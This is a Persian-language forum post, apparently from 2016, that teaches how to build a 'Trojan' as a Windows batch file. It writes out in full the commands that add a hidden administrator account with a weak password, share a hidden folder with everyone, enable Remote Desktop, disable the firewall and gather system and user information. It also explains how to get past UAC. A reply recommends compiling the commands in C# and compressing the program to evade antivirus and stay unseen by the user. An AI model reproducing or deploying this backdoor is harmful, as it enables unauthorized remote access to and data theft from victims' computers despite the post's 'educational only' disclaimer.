اطلاعیه

بستن
هنوز اطلاعیه ای در دست نیست.

آموزش ساخت Trojan با فرمان های CMD

بستن
X
 
  • فیلتر کردن
  • زمان
  • نمایش
Clear All
پست های جدید

    آموزش ساخت Trojan با فرمان های CMD


    آموزش ساخت
    Trojan با فرمان های CMD



    برای بزرگتر شدن عکس روی آن کلیک کنید

نام:	Trojan-00.jpg
نمایش ها:	1
اندازه:	71.0 KB
شناسه:	20875


    سلام به همه شما دوستان و همراهان همیشگی هیوا

    در این آموزش، می خواهیم با فرمان های CMD یک Trojan ساده و بی درد سر بسازیم. تروجان ما فقط یک سری اطلاعات را برای ما جمع آوری می کند و راه دسترسی به آن اطلاعات و اطلاعات دیگر را هم فراهم می کند. اگر دوست داشتید می توانید کارهای بیشتری را بر دوش این تروجان بگذارید. کل کارهایی که تروجان کوچولوی ما انجام می دهد به قرار زیر است:



    تروجان ما چه کارهایی انجام می دهد؟


    1. ایجاد یک User جدید با دسترسی Admin در کامپیوتر هدف
    2. ایجاد یک پوشه مخفی در درایو ویندوز و Share کردن آن به صورت مخفی با دسترسی User جدید.
    3. فعال کردن Sharing
    4. فعال سازی قابلیت Remote Desktop در کامپیوتر هدف
    5. خاموش کردن Password Protected File Sharing
    6. خاموش کردن فایروال
    7. جمع آوری اطلاعات کامپیوتر شامل موارد زیر:
    IP ،Computer Name ، MAC Address ، لیست کاربران، لیست منابع Share شده
    و انتقال آن ها به پوشه share شده در درایو ویندوز با نام همان کامپیوتر
    8. لیست برنامه های نصب شده و ورژن آن در کامپیوتر هدف
    قبل از شروع:


    مواردی که در این مقاله گفته شده فقط جنبه آموزشی دارد و استفاده نادرست از آن به عهده کاربر است.


    در این آموزش فقط از فرمان های CMD استفاده شده و از هیچ زبان برنامه نویسی و ابزار خاصی استفاده نشده است.
    شروع ساخت Trojan

    یک فایل Text ایجاد کنید و فرمان های زیر را در آن بنویسید:

    1 – ایجاد یک User جدید با دسترسی Admin
    Net user iman 123456 /add
    Net localgroup administrators iman /add
    2 – الف - ایجاد یک پوشه مخفی در درایو ویندوز
    Mkdir c:\Hiva-folder
    c:
    cd\
    attrib hiva-folder +h
    2 – ب – Share کردن آن پوشه به صورت مخفی
    net share trojan-share$=c:\hiva-folder /grant:iman,full /grant:everyone,full
    3 – فعال کردن File and Printer Sharing
    netsh firewall set service type = fileandprint mode = enable
    4 – فعال کردن Remote Desktop در کامپیوتر هدف
    netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contr ol\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    5 – به عهده شما ! ( می توانید این مورد را حذف کنید )
    6 – خاموش کردن فایروال
    Netsh advfirewall set allprofile state off
    7 – گرفتن اطلاعات IP ، MAC Address ، لیست کاربران، لیست منابع Share و SID اکانت Administrator
    ipconfig >>c:\Hiva-folder\%computername%.txt
    getmac >>c:\Hiva-folder\%computername%.txt
    net user >>c:\Hiva-folder\%computername%.txt
    net share >>c:\Hiva-folder\%computername%.txt
    wmic useraccount where name='administrator' get sid >>c:\Hiva-folder\%computername%.txt

    8 – لیست برنامه های نصب شده بر روی سیستم هدف
    Wmic product get name,version >> c:\Hiva-folder\%computername%.txt

    9 - خب حالا عبارت @echo off را در اولین خط این فایل text قرار دهید.
    10 - این فایل text را با نام dear-tro و پسوند .bat ذخیره کنید.
    نمایی از محتویات فایل dear-tro.bat در برنامه notepad++



    برای بزرگتر شدن عکس روی آن کلیک کنید

نام:	Trojan-01.png
نمایش ها:	1
اندازه:	35.9 KB
شناسه:	20876

    مرحله هیجان انگیز کار


    برای اطمینان از این که Trojan کار می کند، یک بار آن را اجرا می کنیم.


    برای بزرگتر شدن عکس روی آن کلیک کنید

نام:	Trojan-02.png
نمایش ها:	1
اندازه:	23.9 KB
شناسه:	20877

    همه فرمان ها با خطا روبرو می شوند!

    چرا این اتفاق افتاد؟


    چون فرمان هایی که در این Batch-file به کار بردیم برای اجرا شدن نیاز به دسترسی سطح Admin دارند.

    حالا برای حلش چه کار کنیم؟


    2 راه حل دارید!
    روش اول:Batch-file را در کامپیوتر هدف Run as administrator کنید:


    برای بزرگتر شدن عکس روی آن کلیک کنید

نام:	Trojan-03.png
نمایش ها:	1
اندازه:	19.1 KB
شناسه:	20878

    روش دوم:
    UAC یا User Account Control را در پایین ترین سطح قرار دهید:

    1. در استارت عبارت UAC را جستجو کنید.
    2. Scroll را در پایین ترین سطح قرار دهید.

    برای بزرگتر شدن عکس روی آن کلیک کنید

نام:	Trojan-04.png
نمایش ها:	1
اندازه:	19.8 KB
شناسه:	20879


    3. کامپیوتر را یک بار Restart کنید.
    حالا دوباره آن را اجرا کنید!

    منبع :
    آخرین ویرایش توسط Habili; در تاریخ/ساعت 03-22-2016, 08:02 PM.

    #2
    دوست عزیز سلام ... بهترین کار ممکن برای اینکار این است که این فرمان ها را در یک زبان سطح بالا مثلا c# به کار برده و سپس ان برنامه کامپایل شده را کمپرس کرده که هم از چشم انتی ویروسه عزیز در امان بماند و هم کاربر به این برنامه شک نکند .... میتوان show in taskbar را disable کرد و ... با ارزوی موفقیت روز افزون

    کامنت

    درباره انجمن منطقه لینوکسی ها

    انجمن منطقه لینوکسی ها با هدف ارتقاء سطح علمی کاربران در سطح جهانی و همچنین کمک به بالا بردن سطح علمی عمومی در زمینه های تخصصی فوق پایه گذاری شده است. انجمن منطقه لینوکسی ها از طریق کارشناسان و متخصصان پاسخگوی سوالات گوناگون کاربران مبتدی یا پیشرفته میباشد تا حد امکان تلاش شده که محیطی متنوع و کاربر پسند و به دور از هرگونه حاشیه جهت فعالیت کاربران در این انجمن ایجاد شود. لذا ما به صورت مستمر برای پیشرفت کمی و کیفی محتوی و اطلاعات انجمنمان میکوشیم که این برای ما ارزشمند و حائز اهمیت است. کلیه حقوق،اطلاعات و مقالات در این انجمن متعلق به سایت منطقه لینوکسی ها میباشد، و هرگونه نسخه برداری بدون ذکر منبع مورد پیگرد قانونی خواهد شد.

    شبکه های اجتماعی
    در حال انجام ...
    X